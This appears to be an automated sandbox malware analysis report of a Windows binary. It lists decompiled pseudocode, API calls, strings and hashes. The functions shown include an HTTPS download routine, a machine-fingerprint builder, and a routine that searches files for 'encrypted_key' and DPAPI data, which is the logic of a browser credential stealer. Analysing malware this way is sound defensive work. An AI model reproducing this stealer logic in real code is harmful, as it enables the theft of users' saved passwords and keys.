0x00416c57
0x00416c64
0x00416c71
0x00416c7e
0x00416c8b
0x00416c98
0x00416c9b
0x00416ca0
0x00416ca6
0x00416cad
0x00416cb0
0x00416cb6
0x00416cb8
0x00416b3c
0x00416b3f
0x00416b3f
0x00416cc6
0x00416cd2

APIs

__EH_prolog3_GS.LIBCMT ref: 00416A53
GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00416A94
GetVolumeInformationA.KERNEL32 ref: 00416AD4
GetProcessHeap.KERNEL32(00000000,00000104), ref: 00416B29
HeapAlloc.KERNEL32(00000000), ref: 00416B30
wsprintfA.USER32 ref: 00416B63
_strlen.LIBCMT ref: 00416B6A

Strings

:\, xrefs: 00416AC5
C, xrefs: 00416A9E
%08lX%04lX%lu-, xrefs: 00416B5D
QuBi, xrefs: 00416AE6

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocDirectoryH_prolog3_InformationProcessVolumeWindows_strlenwsprintf
String ID: %08lX%04lX%lu-$:\$C$QuBi
API String ID: 3758767190-1320645344
Opcode ID: 66bc653c150cb17dcdfafb7093c8ee34f7f3a391c434d0c50fbfd73645771255
Instruction ID: c9bf27b0b701197ce43c73bdec094b852699abbb0fad9a7eaf92845d6f5821d8
Opcode Fuzzy Hash: 66bc653c150cb17dcdfafb7093c8ee34f7f3a391c434d0c50fbfd73645771255
Instruction Fuzzy Hash: AB61A4B29051689FDB21DF658D41BDDBAB8AF59304F0000EEE909B3291DB345F85CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040EFE5 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 95
networkmemoryfileCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E0040EFE5(char* __ecx, void* __eflags) {
				signed int _v8;
				void _v1032;
				void* _v1036;
				long _v1040;
				void* _v1044;
				void* _v1048;
				void _v1052;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t29;
				char* _t45;
				void* _t52;
				void* _t53;
				signed int _t55;
				void* _t56;

				_t24 =  *0x444664; // 0xfa3a0753
				_v8 = _t24 ^ _t55;
				_t45 = __ecx;
				_push("https");
				_v1040 = 1;
				_v1036 = 0;
				_push(E0040E6E2(__ecx, 1, 0));
				if( *0x447510() == 0) {
					_v1036 = 1;
				}
				_t29 = RtlAllocateHeap(GetProcessHeap(), 0, 0x5f5e0ff); // executed
				_v1044 = _t29;
				_t52 = InternetOpenA(0x43d12c, 0, 0, 0, 0);
				_v1048 = _t52;
				_v1052 = 0x927c0;
				InternetSetOptionA(_t52, 2,  &_v1052, 4);
				_push(0);
				if(_v1036 == 0) {
					_push(0x4000100);
				} else {
					_push(0x4800100);
				}
				_v1036 = InternetOpenUrlA(_t52, _t45, 0, 0, ??, ??);
				_t53 = 0;
				while(_v1040 > 0) {
					InternetReadFile(_v1036,  &_v1032, 0x400,  &_v1040); // executed
					_t45 = 0;
					if(_v1040 > 0) {
						do {
							E0041F8C0(_v1044 + _t53, _t55 + _t45 - 0x404, 1);
							_t56 = _t56 + 0xc;
							_t53 = _t53 + 1;
							_t45 =  &(_t45[1]);
						} while (_t45 < _v1040);
						continue;
					}
					break;
				}
				InternetCloseHandle(_v1036);
				InternetCloseHandle(_v1048);
				return E0041F69E(_v1044, _t45, _v8 ^ _t55, _t53, _t53, 0);
			}

0x0040efee
0x0040eff5
0x0040f000
0x0040f002
0x0040f007
0x0040f00d
0x0040f018
0x0040f021
0x0040f023
0x0040f023
0x0040f036
0x0040f045
0x0040f051
0x0040f05f
0x0040f065
0x0040f06f
0x0040f075
0x0040f07c
0x0040f085
0x0040f07e
0x0040f07e
0x0040f07e
0x0040f094
0x0040f09a
0x0040f0ec
0x0040f0b7
0x0040f0bd
0x0040f0c5
0x0040f0c7
0x0040f0da
0x0040f0df
0x0040f0e2
0x0040f0e3
0x0040f0e4
0x00000000
0x0040f0c7
0x00000000
0x0040f0c5
0x0040f0fa
0x0040f106
0x0040f122

APIs

Part of subcall function 0040E6E2: _memset.LIBCMT ref: 0040E6FD
Part of subcall function 0040E6E2: _memset.LIBCMT ref: 0040E70A
Part of subcall function 0040E6E2: lstrlenA.KERNEL32(00000000,10000000,?), ref: 0040E730
Part of subcall function 0040E6E2: InternetCrackUrlA.WININET(00000000,00000000), ref: 0040E738

StrCmpCA.SHLWAPI(00000000,https,00000000,000003E8,00000000), ref: 0040F019
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040F02F
RtlAllocateHeap.NTDLL(00000000), ref: 0040F036
InternetOpenA.WININET(0043D12C,00000000,00000000,00000000,00000000), ref: 0040F04B
InternetSetOptionA.WININET(00000000,00000002,?,00000004), ref: 0040F06F
InternetOpenUrlA.WININET(00000000,?,00000000,00000000,04000100,00000000), ref: 0040F08E
InternetReadFile.WININET(?,?,00000400,?), ref: 0040F0B7
_memmove.LIBCMT ref: 0040F0DA
InternetCloseHandle.WININET(?), ref: 0040F0FA
InternetCloseHandle.WININET(?), ref: 0040F106

Strings

https, xrefs: 0040F002

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHeapOpen_memset$AllocateCrackFileOptionProcessRead_memmovelstrlen
String ID: https
API String ID: 2725049614-1056335270
Opcode ID: 6ded11e0746e2aa4aeb93d617a1ca3ae895fd66534b4460230dfc2bc8d222bab
Instruction ID: b28f1bee16d3f1b3bf1f32ec6be5a62c88eae9e21c1b02b4a87f5b2b729d5ebd
Opcode Fuzzy Hash: 6ded11e0746e2aa4aeb93d617a1ca3ae895fd66534b4460230dfc2bc8d222bab
Instruction Fuzzy Hash: DE3174B4900228ABCB209F61DC49ADABB7CEB45755F1044B6B709B2151DB744E86CFAC

Uniqueness

Uniqueness Score: -1.00%

Function 00409CAB Relevance: 18.1, APIs: 12, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E00409CAB(CHAR* __ecx, void* __edx, long _a4) {
				signed int _v12;
				struct _GENERIC_MAPPING _v28;
				struct _PRIVILEGE_SET _v48;
				long _v52;
				void* _v56;
				void* _v60;
				int _v64;
				long _v68;
				long _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t37;
				int _t40;
				int _t46;
				signed char _t65;
				void* _t71;
				CHAR* _t72;
				struct _SECURITY_DESCRIPTOR* _t74;
				signed int _t75;

				_t71 = __edx;
				_t37 =  *0x444664; // 0xfa3a0753
				_v12 = _t37 ^ _t75;
				_t65 = 0;
				_t72 = __ecx;
				_v52 = 0;
				_t40 = GetFileSecurityA(__ecx, 7, 0, 0,  &_v52); // executed
				if(_t40 == 0 && GetLastError() == 0x7a) {
					_t74 = E0041FC5B(_t71, _t72, _t74, _v52);
					if(_t74 != 0) {
						_t46 = GetFileSecurityA(_t72, 7, _t74, _v52,  &_v52); // executed
						if(_t46 != 0) {
							_v56 = 0;
							if(OpenProcessToken(GetCurrentProcess(), 0x2000e,  &_v56) != 0) {
								_v60 = 0;
								if(DuplicateToken(_v56, 2,  &_v60) != 0) {
									asm("stosd");
									asm("stosd");
									asm("stosd");
									_v48.PrivilegeCount = 0;
									_t72 =  &(_v48.Control);
									asm("stosd");
									asm("stosd");
									asm("stosd");
									asm("stosd");
									_v68 = 0;
									_v72 = 0x14;
									_v64 = 0;
									_v28.GenericRead = 0x120089;
									_v28.GenericWrite = 0x120116;
									_v28.GenericExecute = 0x1200a0;
									_v28.GenericAll = 0x1f01ff;
									MapGenericMask( &_a4,  &_v28);
									if(AccessCheck(_t74, _v60, _a4,  &_v28,  &_v48,  &_v72,  &_v68,  &_v64) != 0) {
										_t65 = 0 | _v64 == 0x00000001;
									}
									CloseHandle(_v60);
								}
								CloseHandle(_v56);
							}
							E0041FC21(_t74);
						}
					}
				}
				return E0041F69E(_t65 & 0x000000ff, _t65, _v12 ^ _t75, _t71, _t72, _t74);
			}

0x00409cab
0x00409cb1
0x00409cb8
0x00409cc2
0x00409cc6
0x00409ccb
0x00409cce
0x00409cd6
0x00409cf3
0x00409cf8
0x00409d09
0x00409d11
0x00409d20
0x00409d32
0x00409d41
0x00409d4c
0x00409d57
0x00409d58
0x00409d59
0x00409d5c
0x00409d5f
0x00409d62
0x00409d63
0x00409d64
0x00409d65
0x00409d6e
0x00409d71
0x00409d78
0x00409d7b
0x00409d82
0x00409d89
0x00409d90
0x00409d97
0x00409dc0
0x00409dc6
0x00409dc6
0x00409dcc
0x00409dcc
0x00409dd5
0x00409dd5
0x00409ddc
0x00409de1
0x00409d11
0x00409cf8
0x00409df3

APIs

GetFileSecurityA.ADVAPI32(?,00000007,00000000,00000000,?), ref: 00409CCE
GetLastError.KERNEL32(?,00000007,00000000,00000000,?), ref: 00409CDC
_malloc.LIBCMT ref: 00409CEE

Part of subcall function 0041FC5B: __FF_MSGBANNER.LIBCMT ref: 0041FC74
Part of subcall function 0041FC5B: __NMSG_WRITE.LIBCMT ref: 0041FC7B
Part of subcall function 0041FC5B: RtlAllocateHeap.NTDLL(00000000,00000001,00000000,000003E8,00000400,?,00420486,0040B965,?,?,0040B965,00000400,?,00000000,000003E8), ref: 0041FCA0

GetFileSecurityA.ADVAPI32(?,00000007,00000000,?,?), ref: 00409D09
GetCurrentProcess.KERNEL32(0002000E,?,?,00000007,00000000,?,?,?,00000007,00000000,00000000,?), ref: 00409D23
OpenProcessToken.ADVAPI32(00000000,?,00000007,00000000,?,?,?,00000007,00000000,00000000,?), ref: 00409D2A
DuplicateToken.ADVAPI32(?,00000002,?,?,00000007,00000000,?,?,?,00000007,00000000,00000000,?), ref: 00409D44
MapGenericMask.ADVAPI32(?,?,?,00000007,00000000,?,?,?,00000007,00000000,00000000,?), ref: 00409D97
AccessCheck.ADVAPI32(00000000,?,?,00120089,?,00000014,?,?,?,00000007,00000000,?,?,?,00000007,00000000), ref: 00409DB8
CloseHandle.KERNEL32(?,?,00000007,00000000,?,?,?,00000007,00000000,00000000,?), ref: 00409DCC
CloseHandle.KERNEL32(?,?,00000007,00000000,?,?,?,00000007,00000000,00000000,?), ref: 00409DD5
_free.LIBCMT ref: 00409DDC

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: CloseFileHandleProcessSecurityToken$AccessAllocateCheckCurrentDuplicateErrorGenericHeapLastMaskOpen_free_malloc
String ID:
API String ID: 1304225167-0
Opcode ID: d83638c0eb365104ef47b0fe46211084c3b6989eae3530c58e628865b8b115c5
Instruction ID: 3b101b4cba3cfdaa6bec9e9a377fba076a196b3bc183ef5e314757ae264009da
Opcode Fuzzy Hash: d83638c0eb365104ef47b0fe46211084c3b6989eae3530c58e628865b8b115c5
Instruction Fuzzy Hash: 48411776900219BFDB019FE5ED84AEEBBBCFF09300F10443AF601E6160DB3499498B64

Uniqueness

Uniqueness Score: -1.00%

Function 0040F8E2 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 113
memoryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E0040F8E2(void* __ebx, intOrPtr __ecx, char* __edi, void* __esi, void* __eflags) {
				void* _t40;
				char* _t44;
				void* _t48;
				intOrPtr _t52;
				void* _t53;
				void* _t60;
				char* _t80;
				void* _t82;
				void* _t86;

				_t83 = __edi;
				_push(0x38);
				E00423679(E0043319D, __ebx, __edi, __esi);
				 *(_t86 - 0x3c) =  *(_t86 - 0x3c) & 0x00000000;
				 *((intOrPtr*)(_t86 - 0x44)) = __ecx;
				_t85 = _t86 - 0x30;
				_t66 = _t86 - 0x34;
				 *((intOrPtr*)(_t86 - 0x40)) =  *((intOrPtr*)(_t86 + 0xc));
				_t40 = E0040F703(_t86 - 0x34, _t86 - 0x30,  *((intOrPtr*)(_t86 + 8))); // executed
				if(_t40 == 0 ||  *((intOrPtr*)(_t86 - 0x34)) == 0) {
					L19:
					return E004236C3(_t66, _t83, _t85);
				} else {
					_t85 =  *(_t86 - 0x30);
					if(_t85 == 0) {
						goto L19;
					}
					_t44 = LocalAlloc(0x40, _t85 + 1); // executed
					_t83 = _t44;
					if(_t83 == 0) {
						goto L19;
					}
					if(_t85 == 0) {
						L7:
						if(StrStrA(_t83, "encrypted_key") != 0) {
							E004049CF(_t86 - 0x2c, _t45 + 0x10); // executed
							 *(_t86 - 4) =  *(_t86 - 4) & 0x00000000;
							_t85 = "\"}";
							_t48 = E004201E0("\"}");
							_pop(_t73);
							if(E0040CD72(0, _t86 - 0x2c, _t85, _t48) != 0xffffffff) {
								_t73 = _t86 - 0x2c;
								E00404C57(_t86 - 0x2c, _t51, 0xffffffff);
							}
							_t52 =  *((intOrPtr*)(_t86 - 0x2c));
							if( *((intOrPtr*)(_t86 - 0x18)) < 0x10) {
								_t52 = _t86 - 0x2c;
							}
							_t83 = _t86 - 0x38;
							_t53 = E0040F78C(_t86 - 0x30, _t73, _t86 - 0x38, _t52);
							_t66 = 1;
							if(_t53 != 0 &&  *(_t86 - 0x38) >= 5) {
								_t85 =  *(_t86 - 0x30);
								if(E004207E7( *(_t86 - 0x30), ?str?, 5) == 0) {
									_t83 = _t86 - 0x30;
									_t60 = E0040F7E5(_t85 + 5, _t86 - 0x30,  *(_t86 - 0x38) + 0xfffffffb, _t86 - 0x34); // executed
									if(_t60 != 0 &&  *(_t86 - 0x30) == 0x20) {
										 *(_t86 - 0x3c) = 1;
										E0040F878( *((intOrPtr*)(_t86 - 0x40)),  *((intOrPtr*)(_t86 - 0x44)),  *((intOrPtr*)(_t86 - 0x34)));
									}
								}
							}
							E00404A66(_t86 - 0x2c, _t66, 0);
						}
						goto L19;
					} else {
						_t80 = _t83;
						_t82 =  *((intOrPtr*)(_t86 - 0x34)) - _t83;
						do {
							 *_t80 =  *((intOrPtr*)(_t82 + _t80));
							_t80 =  &(_t80[1]);
							_t85 = _t85 - 1;
						} while (_t85 != 0);
						goto L7;
					}
				}
			}

0x0040f8e2
0x0040f8e2
0x0040f8e9
0x0040f8f1
0x0040f8f5
0x0040f8fc
0x0040f8ff
0x0040f902
0x0040f905
0x0040f90d
0x0040fa1b
0x0040fa23
0x0040f91d
0x0040f91d
0x0040f922
0x00000000
0x00000000
0x0040f92e
0x0040f934
0x0040f938
0x00000000
0x00000000
0x0040f940
0x0040f952
0x0040f960
0x0040f96d
0x0040f972
0x0040f976
0x0040f97c
0x0040f981
0x0040f992
0x0040f997
0x0040f99a
0x0040f99a
0x0040f9a3
0x0040f9a6
0x0040f9a8
0x0040f9a8
0x0040f9ac
0x0040f9b2
0x0040f9b9
0x0040f9bd
0x0040f9c5
0x0040f9da
0x0040f9ea
0x0040f9ed
0x0040f9f6
0x0040fa07
0x0040fa0a
0x0040fa0f
0x0040f9f6
0x0040f9da
0x0040fa16
0x0040fa16
0x00000000
0x0040f942
0x0040f945
0x0040f947
0x0040f949
0x0040f94c
0x0040f94e
0x0040f94f
0x0040f94f
0x00000000
0x0040f949
0x0040f940

APIs

__EH_prolog3_GS.LIBCMT ref: 0040F8E9

Part of subcall function 0040F703: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00000001,00000000,00000001,?,?,?,0040939F), ref: 0040F71B
Part of subcall function 0040F703: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,0040939F,?,?), ref: 0040F732
Part of subcall function 0040F703: LocalAlloc.KERNEL32(00000040,?,?,?,?,0040939F,?,?), ref: 0040F749
Part of subcall function 0040F703: ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,0040939F,?,?), ref: 0040F760
Part of subcall function 0040F703: LocalFree.KERNEL32(?,?,?,?,0040939F,?,?), ref: 0040F778
Part of subcall function 0040F703: CloseHandle.KERNEL32(?,?,?,?,0040939F,?,?), ref: 0040F781

LocalAlloc.KERNEL32(00000040,?,00000038,0040906E,?,?,00000001,00000000,00000001,?,?,?,0040939F,?,?), ref: 0040F92E
StrStrA.SHLWAPI(00000000,encrypted_key,?,?,?,0040939F,?,?), ref: 0040F958
_strlen.LIBCMT ref: 0040F97C
_memcmp.LIBCMT ref: 0040F9D0

Strings

DPAPI, xrefs: 0040F9CA
, xrefs: 0040F9F8
encrypted_key, xrefs: 0040F952

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: FileLocal$Alloc$CloseCreateFreeH_prolog3_HandleReadSize_memcmp_strlen
String ID: $DPAPI$encrypted_key
API String ID: 4191465999-454896251
Opcode ID: 3067ef7c9f0d888bf1bbd3a627c601cfabd0f196aee2d9983bbf70559ad2407b
Instruction ID: b94eb3f66a261bad663108d4c58ae732cf5f89f3261b73c1c4f1ec2724a6c1cf
Opcode Fuzzy Hash: 3067ef7c9f0d888bf1bbd3a627c601cfabd0f196aee2d9983bbf70559ad2407b
Instruction Fuzzy Hash: D4418472E00219ABCB25DBA4EC81ADE7378BF44314F11813BF411B76D1DB38A949CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0040C547 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 79
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E0040C547(void* __edx, void* __esi) {
				signed int _v8;
				char _v276;
				char _v531;
				char _v532;
				void* _v536;
				int _v540;
				void* __ebx;
				void* __edi;
				signed int _t17;
				long _t22;
				void* _t50;
				void* _t53;
				signed int _t54;

				_t53 = __esi;
				_t50 = __edx;
				_t17 =  *0x444664; // 0xfa3a0753
				_v8 = _t17 ^ _t54;
				_v540 = 0xff;
				_v532 = 0;
				E0041F6B0( &_v531, 0, 0xfe);
				_t22 = RegOpenKeyExA(0x80000001,  *0x446ddc, 0, 0x20119,  &_v536); // executed
				if(_t22 == 0) {
					RegQueryValueExA(_v536,  *0x44716c, 0, 0,  &_v532,  &_v540);
				}
				RegCloseKey(_v536);
				E0041F6B0( &_v276, 0, 0x104);
				 *0x4474e0( &_v276,  &_v532);
				 *0x4474e0("\\config\\");
				E0040C3ED(0,  &_v532,  *0x446ad8); // executed
				_t52 =  &_v276;
				E0040C3ED(0,  &_v276,  *0x446d68); // executed
				E0040C3ED(0,  &_v276,  *0x446a7c); // executed
				E0040C3ED(0,  &_v276,  *0x447228);
				E0040C3ED(0, _t52,  *0x446dc8);
				return E0041F69E(E0040C3ED(0, _t52,  *0x446fcc), 0, _v8 ^ _t54, _t50, _t52, _t53,  &_v276);
			}

0x0040c547
0x0040c547
0x0040c550
0x0040c557
0x0040c56b
0x0040c575
0x0040c57b
0x0040c59b
0x0040c5a3
0x0040c5c1
0x0040c5c1
0x0040c5cd
0x0040c5e0
0x0040c5f6
0x0040c608
0x0040c61a
0x0040c626
0x0040c62c
0x0040c638
0x0040c644
0x0040c650
0x0040c66f

APIs

_memset.LIBCMT ref: 0040C57B
RegOpenKeyExA.KERNEL32(80000001,00000000,00020119,?), ref: 0040C59B
RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,000000FF), ref: 0040C5C1
RegCloseKey.ADVAPI32(?), ref: 0040C5CD
_memset.LIBCMT ref: 0040C5E0
lstrcat.KERNEL32(?,?), ref: 0040C5F6
lstrcat.KERNEL32(?,\config\), ref: 0040C608

Strings

\config\, xrefs: 0040C5FC

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: _memsetlstrcat$CloseOpenQueryValue
String ID: \config\
API String ID: 1663104428-327132148
Opcode ID: 2cce2246cc3d74f9df0adb9db2fa44b37f5f2d0bdde50f9694afa257b1f6c31d
Instruction ID: 25f18ad0f83e3d2afd24f72acc6d71f402cc0eba6ad1d6fff748a2700010f34e
Opcode Fuzzy Hash: 2cce2246cc3d74f9df0adb9db2fa44b37f5f2d0bdde50f9694afa257b1f6c31d
Instruction Fuzzy Hash: 73216FB694011CEFDB11AF50ECCAEE97778FB15308F0004BAB514A10B1DBB55E998F98

Uniqueness

Uniqueness Score: -1.00%

Function 0041212B Relevance: 13.8, APIs: 9, Instructions: 281
stringCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E0041212B(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t130;
				intOrPtr* _t133;
				intOrPtr _t136;
				void* _t144;
				void* _t146;
				void* _t148;
				void* _t151;
				intOrPtr* _t153;
				void* _t174;
				void* _t176;
				void* _t179;
				intOrPtr* _t181;
				intOrPtr _t208;
				intOrPtr _t210;
				intOrPtr* _t232;
				intOrPtr* _t243;
				void* _t246;
				void* _t247;
				intOrPtr _t250;
				intOrPtr _t251;
				void* _t252;
				void* _t253;
				void* _t254;

				_t254 = __eflags;
				E00423679(E00433FED, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t246 - 0x8b0)) =  *((intOrPtr*)(_t246 + 8));
				E004049CF(_t246 - 0x818, E004181BE(__ebx, __edi, __esi, 0x1a));
				_t234 = 0x3e8;
				_t243 = 0;
				 *((intOrPtr*)(_t246 - 4)) = 0;
				E0041F6B0(_t246 - 0x3f8, 0, 0x3e8);
				E0041F6B0(_t246 - 0x7e0, 0, 0x3e8);
				 *0x4474e0(_t246 - 0x3f8, E004181BE(__ebx, 0x3e8, 0, 0x1a), 0x8b8);
				 *0x4474e0(_t246 - 0x3f8,  *0x446e28);
				 *0x4474e0(_t246 - 0x3f8,  *0x446aec);
				 *0x4474e0(_t246 - 0x7e0, E004181BE(__ebx, 0x3e8, 0, 0x1a));
				 *0x4474e0(_t246 - 0x7e0,  *0x446fbc);
				 *0x4474e0(_t246 - 0x7e0, "*");
				_t250 = _t247 + 0x18 - 0x1c;
				 *((intOrPtr*)(_t246 - 0x8ac)) = _t250;
				E004049CF(_t250, _t246 - 0x3f8);
				E00417F60(_t246 - 0x8c0, 0x3e8, 0, _t254); // executed
				 *((char*)(_t246 - 4)) = 1;
				_t130 =  *((intOrPtr*)(_t246 - 0x8bc));
				_t208 =  *((intOrPtr*)(_t246 - 0x8c0));
				 *((intOrPtr*)(_t246 - 0x8ac)) = _t130;
				 *((intOrPtr*)(_t246 - 0x8a8)) = _t208;
				_t255 = _t208 - _t130;
				if(_t208 != _t130) {
					do {
						E0040E3DA(_t246 - 0x7fc,  *((intOrPtr*)(_t246 - 0x8a8)));
						 *((char*)(_t246 - 4)) = 2;
						 *((intOrPtr*)(_t246 - 0x8c4)) = E00417D3E(_t246 - 0x7fc, _t232, _t246 - 0x888);
						 *((char*)(_t246 - 4)) = 3;
						_push( *0x446e28);
						_push(_t246 - 0x8a4);
						_t174 = E0040CEE5(1, _t246 - 0x818, _t243, _t255);
						 *((char*)(_t246 - 4)) = 4;
						_t176 = E00404DE3( *((intOrPtr*)(_t246 - 0x8c4)), _t174, _t246 - 0x850);
						 *((char*)(_t246 - 4)) = 5;
						_t179 = E00417D3E(_t246 - 0x7fc, _t232, _t246 - 0x834);
						 *((char*)(_t246 - 4)) = 6;
						_t181 = E00404DB2(_t174, _t246 - 0x86c,  *0x446c78, _t179);
						_t253 = _t250 + 0xc;
						 *((char*)(_t246 - 4)) = 7;
						if( *((intOrPtr*)(_t176 + 0x14)) < 0x10) {
						}
						if( *((intOrPtr*)(_t181 + 0x14)) < 0x10) {
							_t232 = _t181;
						} else {
							_t232 =  *_t181;
						}
						E0041EAE0( *((intOrPtr*)( *((intOrPtr*)(_t246 - 0x8b0)) + 0x20)), _t232, _t243, 2); // executed
						_t250 = _t253 + 0xc;
						E00404A66(_t246 - 0x86c, 1, _t243);
						E00404A66(_t246 - 0x834, 1, _t243);
						E00404A66(_t246 - 0x850, 1, _t243);
						E00404A66(_t246 - 0x8a4, 1, _t243);
						E00404A66(_t246 - 0x888, 1, _t243);
						_t234 = 0;
						 *((char*)(_t246 - 4)) = 1;
						E0040CE40(0, _t246 - 0x7fc, 1);
						 *((intOrPtr*)(_t246 - 0x8a8)) =  *((intOrPtr*)(_t246 - 0x8a8)) + 0x1c;
						_t243 = 0;
						_t258 =  *((intOrPtr*)(_t246 - 0x8a8)) -  *((intOrPtr*)(_t246 - 0x8ac));
					} while ( *((intOrPtr*)(_t246 - 0x8a8)) !=  *((intOrPtr*)(_t246 - 0x8ac)));
				}
				_t251 = _t250 - 0x1c;
				 *((intOrPtr*)(_t246 - 0x8ac)) = _t251;
				E004049CF(_t251, _t246 - 0x7e0);
				_t133 = E00417F60(_t246 - 0x7f0, _t234, _t243, _t258); // executed
				_t235 = _t133;
				_t134 = _t246 - 0x8c0;
				if(_t246 - 0x8c0 != _t235) {
					E0040E49D(_t134, _t235);
					 *((intOrPtr*)(_t246 - 0x8c0)) =  *_t235;
					 *((intOrPtr*)(_t246 - 0x8bc)) =  *((intOrPtr*)(_t235 + 4));
					 *((intOrPtr*)(_t246 - 0x8b8)) =  *((intOrPtr*)(_t235 + 8));
					 *_t235 = _t243;
					 *((intOrPtr*)(_t235 + 4)) = _t243;
					 *((intOrPtr*)(_t235 + 8)) = _t243;
				}
				 *((char*)(_t246 - 4)) = 1;
				E0040E49D(_t246 - 0x7f0, _t235);
				_t136 =  *((intOrPtr*)(_t246 - 0x8bc));
				_t210 =  *((intOrPtr*)(_t246 - 0x8c0));
				 *((intOrPtr*)(_t246 - 0x8ac)) = _t136;
				 *((intOrPtr*)(_t246 - 0x8a8)) = _t210;
				_t260 = _t210 - _t136;
				if(_t210 != _t136) {
					do {
						E0040E3DA(_t246 - 0x7fc,  *((intOrPtr*)(_t246 - 0x8a8)));
						 *((char*)(_t246 - 4)) = 9;
						_t144 = E00417D3E(_t246 - 0x7fc, _t232, _t246 - 0x86c);
						 *((char*)(_t246 - 4)) = 0xa;
						_push( *0x446fbc);
						_push(_t246 - 0x834);
						_t146 = E0040CEE5(_t144, _t246 - 0x818, _t243, _t260);
						 *((char*)(_t246 - 4)) = 0xb;
						_t148 = E00404DE3(_t144, _t146, _t246 - 0x850);
						 *((char*)(_t246 - 4)) = 0xc;
						_t151 = E00417D3E(_t246 - 0x7fc, _t232, _t246 - 0x8a4);
						 *((char*)(_t246 - 4)) = 0xd;
						_t153 = E00404DB2(_t146, _t246 - 0x888,  *0x446cec, _t151);
						_t252 = _t251 + 0xc;
						 *((char*)(_t246 - 4)) = 0xe;
						if( *((intOrPtr*)(_t148 + 0x14)) < 0x10) {
						}
						if( *((intOrPtr*)(_t153 + 0x14)) < 0x10) {
							_t232 = _t153;
						} else {
							_t232 =  *_t153;
						}
						E0041EAE0( *((intOrPtr*)( *((intOrPtr*)(_t246 - 0x8b0)) + 0x20)), _t232, _t243, 2); // executed
						_t251 = _t252 + 0xc;
						E00404A66(_t246 - 0x888, 1, _t243);
						E00404A66(_t246 - 0x8a4, 1, _t243);
						E00404A66(_t246 - 0x850, 1, _t243);
						E00404A66(_t246 - 0x834, 1, _t243);
						E00404A66(_t246 - 0x86c, 1, _t243);
						_t235 = 0;
						 *((char*)(_t246 - 4)) = 1;
						E0040CE40(0, _t246 - 0x7fc, 1);
						 *((intOrPtr*)(_t246 - 0x8a8)) =  *((intOrPtr*)(_t246 - 0x8a8)) + 0x1c;
						_t243 = 0;
					} while ( *((intOrPtr*)(_t246 - 0x8a8)) !=  *((intOrPtr*)(_t246 - 0x8ac)));
				}
				E0040E49D(_t246 - 0x8c0, _t235);
				E00404A66(_t246 - 0x818, 1, _t243);
				return E004236C3(_t246 - 0x8c0, _t235, _t243);
			}

0x0041212b
0x00412135
0x0041213f
0x00412152
0x00412157
0x0041215c
0x00412167
0x0041216a
0x0041217b
0x00412193
0x004121a6
0x004121b9
0x004121cf
0x004121e2
0x004121f4
0x004121fa
0x00412205
0x0041220c
0x00412217
0x0041221f
0x00412222
0x00412228
0x0041222e
0x00412234
0x0041223a
0x0041223c
0x00412242
0x0041224e
0x00412260
0x00412269
0x0041226f
0x00412273
0x0041227f
0x00412286
0x0041229b
0x0041229f
0x004122b3
0x004122b7
0x004122bd
0x004122ce
0x004122d3
0x004122d6
0x004122de
0x004122de
0x004122ea
0x004122f0
0x004122ec
0x004122ec
0x004122ec
0x004122ff
0x00412304
0x0041230f
0x0041231c
0x00412329
0x00412336
0x00412343
0x00412349
0x00412351
0x00412354
0x00412359
0x00412366
0x00412368
0x00412368
0x00412242
0x00412374
0x0041237f
0x00412386
0x00412391
0x00412396
0x00412398
0x004123a0
0x004123a4
0x004123ab
0x004123b4
0x004123bd
0x004123c3
0x004123c5
0x004123c8
0x004123c8
0x004123d1
0x004123d5
0x004123da
0x004123e0
0x004123e6
0x004123ec
0x004123f2
0x004123f4
0x004123fa
0x00412406
0x00412418
0x0041241c
0x00412423
0x00412427
0x00412433
0x0041243a
0x0041244b
0x0041244f
0x00412463
0x00412467
0x0041246d
